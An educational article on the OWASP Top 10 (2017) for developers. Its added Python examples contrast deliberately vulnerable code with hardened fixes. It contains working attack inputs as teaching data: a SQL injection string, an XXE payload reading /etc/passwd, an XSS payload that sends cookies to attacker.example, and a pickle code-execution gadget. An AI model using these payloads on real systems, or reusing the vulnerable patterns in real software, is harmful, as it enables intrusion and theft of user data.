OWASP's Top 10 Web Application Security Threats for Developers
About OWASP
The Open Web Application Security Project (OWASP) is a non-profit organization and an open community focused on helping businesses implement cost-effective methods for secure software development, testing, and application maintenance. OWASP emphasizes the integration of people, processes, and technology to address both existing and emerging issues in secure application development, utilizing resources such as libraries, security tools, and industry standards. The sustainability of OWASP's initiatives relies on the contributions of volunteers, including board members, chapter leaders, and project teams.
The OWASP Top 10 – 2017!
In 2017, after gathering data from over 40 application security firms and surveying more than 500 practitioners, OWASP released its "Top 10 Web Application Security Risks." The list was derived from vulnerability data covering hundreds of organizations and over 100,000 real-world applications and APIs, and each risk was prioritized by its prevalence in that data combined with consensus estimates of exploitability, detectability, and impact. Identifying security vulnerabilities in applications is rarely simple, so a comprehensive approach that combines tooling with an informed security mindset is essential for finding and fixing these weaknesses.
What is the Risk?
The OWASP Top 10 identifies the most critical web application security risks that organizations face. For each risk, OWASP estimates likelihood (exploitability, weakness prevalence, and detectability) and technical impact using its Risk Rating Methodology; the business impact is left for each organization to assess for its own applications. Each risk is mapped to the Common Weakness Enumeration (CWE) entries it covers.
What are Application Security Risks?
Over the past decade attackers have gained a far richer toolkit: documented Tactics, Techniques, and Procedures (TTPs), together with ready-made tools for exploiting vulnerabilities in applications and organizational infrastructure. Every weakness is a potential path to compromise. To judge the business impact on your organization, adopt a risk management framework that identifies, analyzes, and evaluates risk in terms of threat agents, attack vectors, security weaknesses, and the likelihood and impact of each; together these factors determine your overall risk.
Scope of Context:
ASR1:2017 - Injection
Injection flaws occur when untrusted data is sent to an interpreter (SQL, NoSQL, OS command, LDAP, XML parser, ORM query) as part of a command or query. The interpreter is tricked into executing unintended commands or returning data the caller is not authorized to read or modify.
Examples: An attacker might alter the 'id' parameter in the browser as follows:
    https://webABC.com/app/accountView?id=' or '1'='1
If the application builds its SQL call by concatenating that untrusted value, the WHERE clause becomes true for every row and the attacker receives all accounts:
    String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
Application Checklist (the application is vulnerable when): * User-supplied data is not validated, filtered, or sanitized. * Dynamic queries or non-parameterized calls are used without context-aware escaping. * Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records. * Hostile data is concatenated directly into dynamic queries, commands, or stored procedures.
Utilizing automated testing tools alongside standard source code review methodologies can help uncover injection vulnerabilities across various data inputs including headers, parameters, cookies, URLs, JSON, SOAP, and XML. For secure Software Development Lifecycle (SDL) practices, consult Microsoft’s guidelines.
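The following is an added example, not code from the article or from OWASP, that reproduces the concatenation pattern above in Python with an in-memory SQLite database and places the hardened, parameterized form beside it; the "accounts" rows are constructed sample data, and the validate_account_id allow-list is an illustration of the checklist's first point rather than a substitute for parameterization.

```python
import re
import sqlite3

# Constructed sample data standing in for the page's "accounts" table.
SAMPLE_ROWS = [("1001", "alice", 500), ("1002", "bob", 1200), ("1003", "carol", 75)]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def account_view_vulnerable(conn, user_id):
    """The page's Java pattern: the request parameter is spliced into the SQL text,
    so whatever the user typed is parsed as SQL. Deliberately vulnerable."""
    query = "SELECT custID, owner, balance FROM accounts WHERE custID='" + user_id + "'"
    return conn.execute(query).fetchall()


def account_view_parameterized(conn, user_id):
    """Hardened: the value is bound as a parameter and can never alter the query's structure."""
    return conn.execute(
        "SELECT custID, owner, balance FROM accounts WHERE custID=?", (user_id,)
    ).fetchall()


def validate_account_id(user_id):
    """Positive (allow-list) validation from the checklist: account ids are short digit strings.
    Defence in depth only; parameterization is what actually prevents injection."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("invalid account id")
    return user_id


INJECTION = "' or '1'='1"   # the page's payload, exactly as typed into ?id=

if __name__ == "__main__":
    db = make_db()
    print(account_view_vulnerable(db, INJECTION))      # every row comes back
    print(account_view_parameterized(db, INJECTION))   # no row has that literal custID
```

With the payload, the vulnerable query becomes SELECT ... WHERE custID='' or '1'='1' and returns the whole table; the parameterized query looks for an account whose id is literally the string ' or '1'='1 and finds nothing.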
ASR2:2017 - Broken Authentication
Broken authentication typically arises from improper implementation of authentication and session management functions, leading to vulnerabilities that attackers can exploit to compromise keys, passwords, and session tokens.
Examples: Credential Stuffing: attackers replay lists of username/password pairs leaked from other breaches; if the application has no automated protection, it acts as a password oracle that confirms which pairs are valid. Password-only Authentication: most authentication attacks succeed because the password is the sole factor. Session Timeouts: if sessions are not expired server-side, a user who closes the browser on a public computer without logging out leaves a session that the next person at that computer can resume.
Application Authentication Weaknesses Checklist (the application is vulnerable if it): * Permits automated attacks such as credential stuffing with lists of valid usernames and passwords. * Permits brute force or other automated guessing attacks. * Permits default, weak, or well-known passwords. * Uses weak or ineffective credential recovery and forgot-password processes, such as knowledge-based answers. * Has missing or ineffective Multi-Factor Authentication (MFA). * Exposes session IDs in the URL. * Does not rotate session IDs after successful login, or does not invalidate them on logout or after a period of inactivity.
ASR3:2017 - Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data such as financial, healthcare, and personally identifiable information (PII). Weak or missing encryption, poor key management, and the absence of data-protection policies let attackers steal or modify such data to commit credit card fraud, identity theft, and other crimes.
Examples: Automatic Database Encryption: credit card numbers are encrypted in the database, but the database decrypts them automatically on retrieval, so a SQL injection flaw returns the card numbers in plaintext. Session Hijacking: a site that does not enforce Transport Layer Security (TLS), or still accepts deprecated SSL versions, lets an attacker on the network downgrade the connection, intercept requests, and steal the session cookie. Unsalted Hashing: a password database that stores unsalted or fast hashes can be cracked offline (for example with GPU rigs) as soon as another flaw, such as a file-upload bug, exposes it.
Checklist: * Classify the data and determine the protection each class needs in use, in transit, and at rest. * Know which regulations apply, such as GDPR and PCI DSS. * Encrypt sensitive data at rest and all data in transit with current protocols, and store passwords only as salted, slow, adaptive hashes. * Do not store sensitive data you do not need; data you do not retain cannot be stolen.
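The added example below (written for this article, not taken from it or from OWASP) covers the two preceding sections together: it stores passwords with a per-user salt and PBKDF2 rather than the unsalted hash the text warns against, throttles repeated failures per account so the login cannot be used as a password oracle, issues a fresh high-entropy session ID on every login, and expires idle sessions server-side. The usernames, passwords, thresholds, and the injectable clock are constructed for the demonstration; the iteration count is deliberately low so the example runs quickly.

```python
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ITERATIONS = 100_000   # modest so the example runs quickly; use a higher count in production
LOCKOUT_AFTER = 5             # failed attempts per account before the account is throttled
LOCKOUT_SECONDS = 900
SESSION_IDLE_SECONDS = 900


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, slow hash: a random per-user salt means equal passwords get different digests."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(password, record):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(candidate, record["digest"])   # constant-time comparison


def unsalted_sha256(password):
    """What the page warns against: fast and unsalted, so one precomputed table cracks every user."""
    return hashlib.sha256(password.encode()).hexdigest()


class Authenticator:
    def __init__(self, clock=time.monotonic):
        self.clock = clock      # injectable so timeouts can be exercised without sleeping
        self.users = {}         # username -> password record
        self.failures = {}      # username -> timestamps of recent failed logins
        self.sessions = {}      # session id -> {"user": ..., "last_seen": ...}

    def register(self, username, password):
        self.users[username] = hash_password(password)

    def _recent_failures(self, username, now):
        recent = [t for t in self.failures.get(username, []) if now - t < LOCKOUT_SECONDS]
        self.failures[username] = recent
        return recent

    def login(self, username, password, pre_login_session_id=None):
        """Returns a fresh session id on success, None on failure or while throttled."""
        now = self.clock()
        if len(self._recent_failures(username, now)) >= LOCKOUT_AFTER:
            return None                                    # brute force / credential stuffing throttled
        record = self.users.get(username)
        if record is None or not verify_password(password, record):
            self.failures.setdefault(username, []).append(now)
            return None                                    # same answer for unknown user and bad password
        self.failures.pop(username, None)
        if pre_login_session_id is not None:
            self.sessions.pop(pre_login_session_id, None)   # rotate: the pre-login id is never kept
        session_id = secrets.token_urlsafe(32)             # high-entropy, unguessable
        self.sessions[session_id] = {"user": username, "last_seen": now}
        return session_id

    def current_user(self, session_id):
        session = self.sessions.get(session_id)
        if session is None:
            return None
        now = self.clock()
        if now - session["last_seen"] > SESSION_IDLE_SECONDS:
            del self.sessions[session_id]                  # idle timeout enforced server-side
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, session_id):
        self.sessions.pop(session_id, None)                # invalidate on logout
```

Note that the throttle is keyed by account, which stops a targeted brute force but not a distributed credential-stuffing run that tries each account only a few times; detecting that case needs the cross-account, per-source view shown under Insufficient Logging & Monitoring below.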
ASR4:2017 - XML External Entities (XXE)
An XML External Entity (XXE) attack abuses the Document Type Definition (DTD): an entity declared with a SYSTEM identifier makes the parser fetch an external resource, such as a local file or an internal URL, and inline its contents. Older or poorly configured XML processors that evaluate such entities let attackers disclose internal files and file shares, scan internal ports, execute remote code in some environments, and cause denial of service.
Examples: An attacker submits a document that declares an external entity pointing at a server file and then references it:
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <foo>&xxe;</foo>
Checklist: * Applications that accept XML directly or as uploads from untrusted sources, or that insert untrusted data into XML documents that are then parsed, are at risk. * Any XML processor in the application or its libraries that has DTDs enabled is particularly vulnerable. * Disable DTDs and external entity resolution in every XML parser, and prefer simpler formats such as JSON for untrusted input.
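The following added example (not from the article or from OWASP) runs the OWASP-style payload above through Python's expat parser twice: once with an external-entity handler that resolves file:// URLs, which is what a resolving parser does and reads the file into the document, and once with a DOCTYPE handler that rejects any DTD before an entity can be declared. Python's expat only fetches external entities when given such a handler, whereas some parsers, Java's default DocumentBuilderFactory among them, resolve them unless told not to. The "secret" file is a constructed temporary file so the example runs offline and leaves /etc/passwd alone; POSIX-style file paths are assumed.

```python
import os
import tempfile
import xml.parsers.expat


def write_secret_file():
    """Constructed stand-in for /etc/passwd so the example is self-contained."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "wb") as f:
        f.write(b"root:x:0:0:root:/root:/bin/bash\n")
    return path


def xxe_payload(path):
    """The OWASP-style document: an external general entity pointing at a local file."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>'
        '<!DOCTYPE foo [<!ELEMENT foo ANY>'
        f'<!ENTITY xxe SYSTEM "file://{path}">]>'
        '<foo>&xxe;</foo>'
    ).encode("latin-1")


def parse_resolving_entities(data):
    """Deliberately vulnerable: resolves SYSTEM entities from the local filesystem,
    which is the behaviour of any parser that evaluates external entities."""
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    text = []

    def on_external_entity(context, base, system_id, public_id):
        sub = parser.ExternalEntityParserCreate(context)
        sub.CharacterDataHandler = text.append
        with open(system_id[len("file://"):], "rb") as f:   # assumes a file:// URL with a POSIX path
            sub.Parse(f.read(), True)
        return 1                                             # tell expat the entity was handled

    parser.CharacterDataHandler = text.append
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(data, True)
    return "".join(text)


class DtdRejected(ValueError):
    """Raised by the hardened parser when untrusted XML carries a DOCTYPE."""


def parse_without_dtd(data):
    """Hardened: any DOCTYPE is rejected before entities can be declared, so neither
    external entities nor entity-expansion (billion laughs) payloads get a chance to run."""
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = True
    text = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected("DOCTYPE/DTD not allowed in untrusted XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return "".join(text)


def rejects_dtd(data):
    """True when the hardened parser refuses the document."""
    try:
        parse_without_dtd(data)
        return False
    except DtdRejected:
        return True
```

In a real service you would not hand-roll this: the defusedxml package applies the same DOCTYPE rejection to every stdlib parser, and the equivalent in Java is disabling the doctype-decl and external-entity features on the factory before parsing.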
ASR5:2017 - Broken Access Control
Access Control (AC) enforces a policy so that users cannot act outside their intended permissions. Broken Access Control (BAC) lets attackers bypass those checks to view other users' data, modify or destroy it, or perform functions reserved for administrators.
Examples: 1. The application uses unverified data in the SQL call that fetches account information, so an attacker who changes the 'acct' parameter in the browser reads any account: http://testing.com/app/accountInfo?acct=notmyacct 2. An attacker browses directly to an administrative URL that is merely hidden from the navigation rather than protected by a server-side check.
Checklist: * Ensure access control checks cannot be bypassed by modifying the URL, the application state, or the HTML page, or by using a custom API client. * Prevent access to other users' records by changing a primary key or identifier. * Deny by default except for public resources, and enforce every check server-side where the attacker cannot alter it.
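Here is an added example, not part of the article, showing the accountInfo?acct= flaw from example 1 beside a deny-by-default authorization check. The accounts, sessions, roles, and policy rules are constructed for the demonstration; the point is that being logged in (authentication) is not the same as being allowed to touch the record the URL names (authorization), and that an unknown record, a foreign record, and an unknown action all get the same refusal so the attacker cannot enumerate ids.

```python
class Forbidden(Exception):
    """Raised when the session may not perform the requested action on the record."""


# Constructed account store and sessions standing in for the page's application.
ACCOUNTS = {
    "1001": {"owner": "alice", "balance": 500},
    "notmyacct": {"owner": "bob", "balance": 1200},
}
SESSIONS = {
    "s-alice": {"user": "alice", "role": "customer"},
    "s-admin": {"user": "root", "role": "admin"},
}


def account_info_vulnerable(session_id, acct):
    """The page's pattern: the user is authenticated, but the 'acct' parameter is trusted as-is,
    so any logged-in user reads any account just by editing the URL. Deliberately vulnerable."""
    if session_id not in SESSIONS:
        raise Forbidden("not logged in")
    return ACCOUNTS[acct]


# Deny-by-default policy: an action is allowed only if a rule exists for it and returns True.
POLICY = {
    "read": lambda session, record: session["role"] == "admin" or record["owner"] == session["user"],
    "transfer": lambda session, record: record["owner"] == session["user"],  # admins cannot move money
}


def account_action_checked(session_id, acct, action):
    """Hardened: ownership or role is checked server-side for every request."""
    session = SESSIONS.get(session_id)
    record = ACCOUNTS.get(acct)
    rule = POLICY.get(action)
    # Missing session, unknown record, unknown action and unauthorized access all get the
    # same answer, so the response cannot be used to enumerate which account ids exist.
    if session is None or record is None or rule is None or not rule(session, record):
        raise Forbidden(f"{action} on {acct} denied")
    return record


def is_denied(session_id, acct, action):
    """Convenience wrapper for checking the policy outcome as a boolean."""
    try:
        account_action_checked(session_id, acct, action)
        return False
    except Forbidden:
        return True
```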
ASR6:2017 - Security Misconfiguration
Security misconfiguration is the most commonly seen issue: missing hardening, unnecessary features left enabled, default accounts and passwords, verbose error handling, and out-of-date software. Many developers ship with the defaults their framework or server came with.
Examples: Application Server: a production server still hosts the sample applications that came with the server, and one of them has a known flaw that gives attackers a foothold. Directory Listing: if not disabled, attackers browse the directory tree, download compiled classes or source, and look for flaws. Server Configuration: detailed error messages such as stack traces reveal component versions and internal details that guide further attacks.
Checklist: * Identify and apply missing security hardening across the application stack, and repeat it for every environment. * Ensure default accounts and passwords are not in use. * Remove unused features, sample applications and documentation, and return generic error pages that reveal nothing about the server's internals.
ASR7:2017 - Cross-Site Scripting (XSS)
XSS flaws occur when an application includes untrusted data in a web page without proper validation or escaping, or updates an existing page with user-supplied data through a browser API that can create HTML or JavaScript. The attacker's script then runs in the victim's browser, where it can hijack the session, deface the site, or redirect the user to a malicious site.
Examples: The application uses untrusted data to build an HTML snippet without validation or escaping:
    page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("cc") + "'>";
The attacker sets the 'cc' parameter to a value that closes the attribute and injects a script, for example one that sends the victim's session cookie (document.cookie) to a site the attacker controls.
Three primary types of XSS attack: * Reflected XSS: the application includes unvalidated, unescaped user input directly in its HTML output, so a link or form crafted by the attacker executes in the victim's browser. * Stored XSS: unsanitized input is stored and later rendered to another user or an administrator. * DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in the page.
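As an added example (not from the article), the snippet below reproduces the creditcard input above in Python, puts the context-appropriate escaped form next to it, and shows that a second context, a value placed inside a script block, needs a different encoder. The payload is constructed to match the page's description, using attacker.example as a placeholder host.

```python
import html
import json

# Constructed payload of the kind the page describes: it closes the value attribute, then
# injects a script that ships document.cookie to a host the attacker controls.
PAYLOAD = "'><script>document.location='https://attacker.example/c?'+document.cookie</script>"


def render_vulnerable(cc):
    """The page's pattern: untrusted data concatenated straight into HTML. Deliberately vulnerable."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_escaped(cc):
    """Hardened for an HTML attribute context: html.escape neutralises <, >, &, \" and '."""
    return "<input name='creditcard' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


def render_into_script(value):
    """A different context needs a different encoder: inside <script>, a JSON string literal
    (with '</' broken up so a '</script>' in the data cannot end the block early) is the safe form."""
    literal = json.dumps(value).replace("</", "<\\/")
    return "<script>var cc = " + literal + ";</script>"


def contains_injected_script(page):
    """Does the attacker's payload survive as live markup the browser would execute?"""
    return "<script>document.location" in page
```

HTML-escaping is only correct for HTML body and attribute contexts; data placed in a script, a URL, or a CSS value needs that context's own encoder, which is why render_into_script does not reuse html.escape.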
ASR8:2017 - Insecure Deserialization
Insecure deserialization occurs when an application deserializes data it does not control, such as cookies, saved session state, cache entries, or message payloads. If the serialization format can encode arbitrary object types, an attacker supplies objects whose load-time behaviour runs code (a gadget chain), which frequently leads to remote code execution; even where code execution is not possible, tampering with serialized state enables replay, privilege escalation, and injection attacks.
Examples: An attacker tampers with a serialized object stored in a cookie so that its role field reads admin instead of user, or sends a crafted serialized Java object whose deserialization executes attacker-chosen code. Tools such as Java Serial Killer automate generating such payloads.
Checklist: * Applications and APIs are vulnerable if they deserialize hostile or tampered objects supplied by an attacker. * Accept serialized objects only from trusted sources; otherwise use a data-only format such as JSON, add an integrity check such as a signature, restrict the types that may be deserialized, and log deserialization failures.
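The following added example (written for this article, not taken from it) demonstrates both failure modes on Python's pickle format: a cookie whose role is simply rewritten, because the format carries no integrity, and a cookie whose deserialization runs an attacker-chosen callable. Beside it is the hardened pattern from the checklist, a data-only JSON document with an HMAC tag and a strict shape check. The signing key, user names, and roles are constructed; the gadget calls os.getcwd as a harmless proof of execution where a real payload would call os.system.

```python
import hashlib
import hmac
import json
import os
import pickle


def pickle_cookie(user, role):
    """How the vulnerable application mints its session cookie."""
    return pickle.dumps({"user": user, "role": role})


def load_pickle_cookie(cookie):
    """Deliberately vulnerable: pickle.loads does whatever the bytes instruct it to construct."""
    return pickle.loads(cookie)


class Gadget:
    """Stand-in for a gadget chain. __reduce__ tells pickle which callable to invoke on load;
    os.getcwd is a harmless proof that attacker-chosen code ran (an attacker would pick os.system)."""
    def __reduce__(self):
        return (os.getcwd, ())


def forged_rce_cookie():
    return pickle.dumps(Gadget())


def forged_admin_cookie():
    """No code execution needed: the format has no integrity, so the role is simply rewritten."""
    return pickle.dumps({"user": "Mallory", "role": "admin"})


def demo_rce():
    """True when loading the forged cookie executed os.getcwd inside the application."""
    return load_pickle_cookie(forged_rce_cookie()) == os.getcwd()


# Hardened alternative: data-only JSON plus an HMAC so tampering is detected.
KEY = b"constructed-example-key-load-from-a-secret-store"
ALLOWED_ROLES = {"user", "admin"}


def sign_state(state, key=KEY):
    payload = json.dumps(state, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return payload + b"." + tag


def verify_state(cookie, key=KEY):
    payload, _, tag = cookie.rpartition(b".")
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("cookie signature invalid")
    state = json.loads(payload)   # JSON yields dicts, lists and scalars only, never objects with behaviour
    if not isinstance(state, dict) or set(state) != {"user", "role"} or state["role"] not in ALLOWED_ROLES:
        raise ValueError("unexpected state shape")
    return state


def is_rejected(cookie):
    try:
        verify_state(cookie)
        return False
    except ValueError:
        return True
```

The signature stops tampering only while the key stays secret; an attacker who obtains the key can mint any state, which is why the preferred option is to keep session state server-side and hand the client nothing but an opaque identifier.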
ASR9:2017 - Using Components with Known Vulnerabilities
Production environments routinely run libraries, frameworks, and other components with known vulnerabilities. A component runs with the same privileges as the application that includes it, so a single flawed dependency can compromise the whole system.
Examples: * CVE-2017-5638: a remote command execution flaw in the Jakarta multipart (file upload) parser of Apache Struts 2, triggered by a crafted Content-Type header on an upload request.
Checklist: * Know the versions of every component you use, client-side and server-side, and of their dependencies. * Continuously monitor sources such as CVE and NVD for vulnerabilities in those components and patch or upgrade promptly. * Remove unused dependencies and features, and obtain components only from official sources.
ASR10:2017 - Insufficient Logging & Monitoring
Insufficient logging and monitoring, together with missing or ineffective integration with incident response, lets attackers keep probing, persist, and pivot to other systems unnoticed; without it, breaches are typically discovered by outside parties long after the fact. Enable, centralize, and actually review logging across applications and services.
Examples: Auditable events such as logins, failed logins, and high-value transactions are not logged at all; logs are kept only on the local host, where an attacker erases the traces of their activity; warnings and errors produce no alerts; a penetration test or vulnerability scan runs against the application and nobody notices.
Checklist: * Ensure all login attempts, access control failures, and server-side input validation failures are logged with enough user context to identify suspicious accounts, and retained long enough for forensic analysis. * Ensure logs are in a format that a centralized log management solution can consume, and that alerting and an incident response plan exist for suspicious activity.
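To make the checklist concrete, here is an added example (not from the article) of detection logic run over constructed login log lines: it parses the events, then raises one alert when a single source address fails against many distinct accounts in a short window (credential stuffing, which a per-account lockout never sees) and another when a single account accumulates repeated failures (brute force). The log format, thresholds, window, and the 203.0.113.0/24 and 198.51.100.0/24 documentation addresses are all assumptions for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: one line per login attempt, the outcome logged but never the password.
LINE = re.compile(r"^(?P<ts>\S+) login ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse(lines):
    """Returns (timestamp, ip, user, result) tuples; lines that do not fit the format are ignored."""
    events = []
    for line in lines:
        m = LINE.match(line.strip())
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect(lines, window=timedelta(minutes=5), ip_threshold=10, user_threshold=5):
    """Two detections the checklist calls for, over failed logins only:
    - one source IP failing against >= ip_threshold distinct accounts inside the window
    - one account failing >= user_threshold times inside the window."""
    events = sorted(parse(lines))
    by_ip = defaultdict(list)     # ip -> [(ts, user)]
    by_user = defaultdict(list)   # user -> [ts]
    for ts, ip, user, result in events:
        if result == "FAIL":
            by_ip[ip].append((ts, user))
            by_user[user].append(ts)

    alerts = []
    for ip, fails in by_ip.items():
        for i, (start, _) in enumerate(fails):                 # slide the window over this IP's failures
            users = {u for t, u in fails[i:] if t - start <= window}
            if len(users) >= ip_threshold:
                alerts.append(("credential_stuffing", ip))
                break
    for user, times in by_user.items():
        for i, start in enumerate(times):
            if sum(1 for t in times[i:] if t - start <= window) >= user_threshold:
                alerts.append(("brute_force", user))
                break
    return alerts


# Constructed sample log: a stuffing run against twelve accounts, a guessing run against alice,
# one ordinary failed-then-successful login for bob, and a line that does not match the format.
SAMPLE_LOG = (
    [f"2017-03-06T10:00:{i:02d}Z login ip=203.0.113.7 user=user{i:02d} result=FAIL" for i in range(12)]
    + [f"2017-03-06T10:01:{i * 10:02d}Z login ip=198.51.100.4 user=alice result=FAIL" for i in range(6)]
    + [
        "2017-03-06T10:02:00Z login ip=198.51.100.9 user=bob result=FAIL",
        "2017-03-06T10:02:30Z login ip=198.51.100.9 user=bob result=OK",
        "this line is corrupt and must not crash the detector",
    ]
)
```

Both detections depend on fields the checklist asks you to log in the first place (timestamp, source address, account, outcome); an application that logs only "login failed" with no user context gives the detector nothing to work with.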
— — — — — — — — — — — — — THE END — — — — — — — — — — — —
Quote of the Day: One must not tie a ship to a single anchor, nor life to a single hope — Epictetus
Thank you for reading! Have a great day!